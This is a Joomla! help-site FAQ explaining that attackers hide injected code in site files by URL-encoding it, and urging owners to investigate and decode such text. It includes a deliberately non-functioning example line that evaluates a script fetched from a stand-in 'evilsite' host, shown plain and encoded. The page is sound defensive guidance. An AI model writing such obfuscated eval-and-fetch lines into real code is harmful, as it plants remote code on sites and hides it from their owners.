Support Joomla!

1.5 Template Project

The Joomla! Documentation Working Group is running a project to develop detailed reference and tutorial material on Joomla! 1.5 templates.  There is a project page on the documentation wiki where you can see the work in progress and help us by contributing your knowledge.

Who's Online

We have 44 guests online

Help Site License

The Joomla! Help Site content is copyright © 2005 - 2008 by the individual contributors and can be used in accordance with the Creative Commons License, Attribution NonCommercial ShareAlike 2.5. Some parts of this website may be subject to other licenses.
Home arrow FAQs

RECOVERY: What are these strange (URL-Encoded) characters doing in my code?
Author(s):RliskeyExperience level:Beginner
Contributors:Joomla! version:1.0
Date added:Tuesday, 30 November 1999Date last changed:Thursday, 26 July 2007
 
Overview

Attackers sometimes hide code away from prying eyes by URL Encoding it.


The purpose of URL Encoding is to allow non-URL compatible characters to be passed via the URL. There are many legitimate reasons for doing this, such as hiding email from spammers, dealing with spaces in file names. etc.

However, if you find odd, URL-encoded text in your site's files, you should investigate immediately. URL encoded text is very easy to translate using PHP, javascript, or one of the many free, online translators.


Here are some trivial, non-functioning examples of URL Encoded text:


Original
 URL Encoded
this line has spaces this%20line%20has%20spaces
eval(evil_script(http://www.evilsite/?evilscript.pl"));
 %65val%28%65%76il_%73cri%70t
%28%68tt%70%3A//%77%77%77.
%65%76il%73ite/%3F%65%76il%73
cript.%70l%22%29%29%3B

Resources
  1. Text Unescape Utility
    http://www.linkedresources.com/tools/unescaper_v0.2b1.html
  2. HTML URL-encoding Reference
    http://www.w3schools.com/tags/ref_urlencode.asp

Last Updated Thursday, 26 July 2007
Tags: security, spam, hidden
< Prev   Next >
[ Back ]

Powered by EasyFAQ © 2006 Joomla-addons.org